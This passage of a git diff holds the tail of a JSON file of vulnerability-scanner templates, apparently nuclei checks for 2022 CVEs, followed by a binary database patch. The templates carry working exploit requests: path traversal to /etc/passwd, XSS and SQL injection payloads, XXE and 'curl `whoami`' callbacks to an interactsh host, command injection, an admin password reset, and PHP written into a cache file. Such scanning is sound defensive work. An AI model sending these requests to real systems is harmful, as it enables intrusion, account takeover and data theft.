Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?rest_route=/whm/v3/themesettings"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"background\":","\"footer\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2863","info":{"name":"WordPress WPvivid Backup <0.9.76 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=WPvivid HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-admin/admin-ajax.php?_wpnonce={{nonce}}&action=wpvivid_download_export_backup&file_name=../../../../../../../etc/passwd&file_size=922 HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}/wp-admin/admin.php?page=WPvivid\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["\"_ajax_nonce\":\"([0-9a-z]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-42746","info":{"name":"CandidATS 3.0.0 - Cross-Site Scripting.","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax.php?f=getPipelineJobOrder&joborderID=50&page=0&entriesPerPage=15&sortBy=dateCreatedInt&sortDirection=desc&indexFile=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&isPopup=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","candidat"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-44946","info":{"name":"Rukovoditel <= 3.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=help_pages/pages&action=save&entities_id=24&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&type=page&is_active=1&position=listing&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=&description=\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-0422","info":{"name":"WordPress White Label CMS <2.2.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php?wlcms-action=preview HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nwlcms%5B_login_custom_js%5D=alert%28%2FXSS%2F%29%3B\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["alert(/XSS/);"]},{"type":"word","part":"body","words":["wlcms-login-wrapper"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24129","info":{"name":"Shibboleth OIDC OP <3.0.4 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/idp/profile/oidc/authorize?client_id=demo_rp&request_uri=https://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["ShibbolethIdp"]}]}]},{"id":"CVE-2022-48165","info":{"name":"Wavlink - Improper Access Control","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/ExportLogs.sh"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Password=","Login="],"condition":"and"},{"type":"word","part":"header","words":["filename=\"sysLogs.txt\""]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["Password=([^\\s]+)"]}]}]},{"id":"CVE-2022-31499","info":{"name":"Nortek Linear eMerge E3-Series <0.32-08f - Remote Command Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET /card_scan.php?No=123&ReaderNo=`sleep%207`&CardFormatNo=123 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","contains(header, \"text/html\")","status_code == 200","contains(body, '{\\\"CardNo\\\":false')"],"condition":"and"}]}]},{"id":"CVE-2022-0595","info":{"name":"WordPress Contact Form 7 <1.3.6.3 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------92633278134516118923780781161\n\n-----------------------------92633278134516118923780781161\nContent-Disposition: form-data; name=\"size_limit\"\n\n10485760\n-----------------------------92633278134516118923780781161\nContent-Disposition: form-data; name=\"action\"\n\ndnd_codedropz_upload\n-----------------------------92633278134516118923780781161\nContent-Disposition: form-data; name=\"type\"\n\nclick\n-----------------------------92633278134516118923780781161\nContent-Disposition: form-data; name=\"upload-file\"; filename=\"{{randstr}}.svg\"\nContent-Type: image/jpeg\n\n<svg xmlns=\"http://www.w3.org/2000/svg\" onload=\"alert(document.domain)\"/>\n-----------------------------92633278134516118923780781161--\n","GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/{{randstr}}.svg HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2, \"alert(document.domain)\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2022-32007","info":{"name":"Complete Online Job Search System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser_email={{username}}&user_pass={{password}}&btnLogin=\n","GET /admin/company/index.php?view=edit&id=-3%27%20union%20select%201,md5({{num}}),3,4,5,6--+ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2022-38794","info":{"name":"Zaver - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43140","info":{"name":"kkFileView 4.1.0 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/getCorsFile?urlPath={{base64('https://oast.me')}}"],"matchers":[{"type":"word","part":"body","words":["<h1> Interactsh Server </h1>"]}]}]},{"id":"CVE-2022-4897","info":{"name":"WordPress BackupBuddy <8.8.3 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin-ajax.php?action=pb_backupbuddy_backupbuddy&function=destination_picker&add=local&filter=local&callback_data=%3C/script%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.11\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"onload=alert(document.domain)\")","contains(body_2, \"BackupBudddy iFrame\")"],"condition":"and"}]}]},{"id":"CVE-2022-0208","info":{"name":"WordPress Plugin MapPress <2.73.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?mapp_iframe=1&mapid=--%3E%3Cimg%20src%20onerror=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["<img src onerror=alert(document.domain)>","Bad mapid"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-28219","info":{"name":"Zoho ManageEngine ADAudit Plus <7600 - XML Entity Injection/Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/api/agent/tabs/agentData"],"body":"[\n  {\n    \"DomainName\": \"{{Host}}\",\n    \"EventCode\": 4688,\n    \"EventType\": 0,\n    \"TimeGenerated\": 0,\n    \"Task Content\": \"<?xml version=\\\"1.0\\\" encoding=\\\"UTF-8\\\"?><! foo [ <!ENTITY % xxe SYSTEM \\\"http://{{interactsh-url}}\\\"> %xxe; ]>\"\n  }\n]\n","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["ManageEngine"]}]}]},{"id":"CVE-2022-3980","info":{"name":"Sophos Mobile managed on-premises - XML External Entity Injection","severity":"critical"},"requests":[{"raw":["@timeout: 50s\nPOST /servlets/OmaDsServlet HTTP/1.1\nHost: {{Hostname}}\nContent-Type: \"application/xml\"\n\n<?xml version=\"1.0\"?>\n<!DOCTYPE cdl [<!ENTITY % test SYSTEM \"http://{{interactsh-url}}\">%test;]>\n<cdl>test</cdl>\n"],"redirects":true,"max-redirects":3,"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, 'http') || contains(interactsh_protocol, 'dns')","status_code == 400","len(body) == 0"],"condition":"and"}]}]},{"id":"CVE-2022-40127","info":{"name":"AirFlow < 2.4.0 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /login/ HTTP/1.1\nHost: {{Hostname}}\n","POST /login/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&_csrf_token={{csrf_token}}\n","@timeout: 15s\nPOST /api/v1/dags/example_bash_operator/dagRuns HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n    \"conf\": {\n\"dag_run\": \"{{randstr}}\"\n},\n  \"dag_run_id\": \"id \\\"&& curl `whoami`.{{interactsh-url}}\",\n  \"logical_date\": \"{{date_time(\"%Y-%M-%D\")}}T{{date_time(\"%H:%m:%s\")}}.920Z\"\n\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["state\": \"queued\""]},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf_token","group":1,"regex":["type=\"hidden\" value=\"(.*?)\">"],"internal":true}]}]},{"id":"CVE-2022-36446","info":{"name":"Webmin <1.997 - Authenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /session_login.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&pass={{password}}\n","POST /package-updates/update.cgi HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}/package-updates/update.cgi?xnavigation=1\n\nmode=new&search=ssh&redir=&redirdesc=&u=0%3Becho+%27{{randstr}}%27%27{{randstr}}%27%3B+id%3B+echo+%27{{randstr}}%27%27{{randstr}}%27&confirm=Install%2BNow\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{randstr}}","uid","gid","groups"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1903","info":{"name":"ARMember < 3.4.8 - Unauthenticated Admin Account Takeover","severity":"high"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=arm_shortcode_form_ajax_action&user_pass={{randstr}}&repeat_pass={{randstr}}&arm_action=change-password&key2=x&action2=rp&login2=admin\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Your Password has been reset","arm_success_msg"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24637","info":{"name":"Open Web Analytics 1.7.3 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /index.php?owa_do=base.loginForm&owa_site_id=& HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nowa_user_id=admin&owa_password=wrong+password+xyz&owa_go=&owa_action=base.login&owa_submit_btn=Login\n"],"matchers":[{"type":"word","part":"body","words":["Login Failed"],"internal":true}]},{"raw":["GET /owa-data/caches/1/owa_user/c30da9265ba0a4704db9229f864c9eb7.php HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","part":"body","group":1,"name":"serializedobj","internal":true,"regex":["<\\?php\\\\n\\/\\*([A-Za-z0-9=]+)\\*\\/\\\\n\\?>"]}],"matchers":[{"type":"word","part":"body","words":["<?php\\n"],"internal":true}]},{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nowa_password={{password}}&owa_password2={{password}}&owa_k={{javascript_response}}&owa_action=base.usersChangePassword&owa_submit_btn=Save+Your+New+Password\n"],"matchers":[{"type":"dsl","dsl":["contains(location,'owa_status_code=3006')","status_code==302"],"internal":true,"condition":"and"}]},{"raw":["POST /index.php?owa_do=base.loginForm&owa_site_id=& HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nowa_user_id=admin&owa_password={{password}}&owa_go=&owa_action=base.login&owa_submit_btn=Login\n"],"matchers":[{"type":"dsl","dsl":["contains(set_cookie,'owa_p')","status_code==302"],"internal":true,"condition":"and"}]},{"raw":["GET /index.php?owa_do=base.optionsGeneral HTTP/1.1\nCookie: owa_p={{http_4_owa_p}};owa_u=admin;\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","part":"body","group":1,"name":"nonce","internal":true,"regex":["name=\"owa_nonce\" value=\"([a-z0-9]+)\">"]}]},{"raw":["POST /index.php?owa_do=base.optionsGeneral HTTP/1.1\nHost: {{Hostname}}\nCookie: owa_p={{http_4_owa_p}};owa_u=admin;\nContent-Type: application/x-www-form-urlencoded\n\nowa_action=base.optionsUpdate&owa_nonce={{nonce}}&owa_config[base.error_log_file]=owa-data/caches/{{randstr}}.php&owa_config[base.error_log_level]=2\n"]},{"raw":["POST /index.php?owa_do=base.optionsGeneral HTTP/1.1\nHost: {{Hostname}}\nCookie: owa_p={{http_4_owa_p}};owa_u=admin;\nContent-Type: application/x-www-form-urlencoded\n\nowa_action=base.optionsUpdate&owa_nonce={{nonce}}&owa_config[shell]=<?php+echo base64_decode('{{secret_b64}}');?>\n","GET /owa-data/caches/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[debug_log]","{{secret}}"],"condition":"and"}]}]}]}
\ No newline at end of file
diff --git a/db/db.tar.zst b/db/db.tar.zst
new file mode 100644
index 0000000000000000000000000000000000000000..18801257d9cea2a47a41736c8b2d3a9299908213
GIT binary patch
literal 551365
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
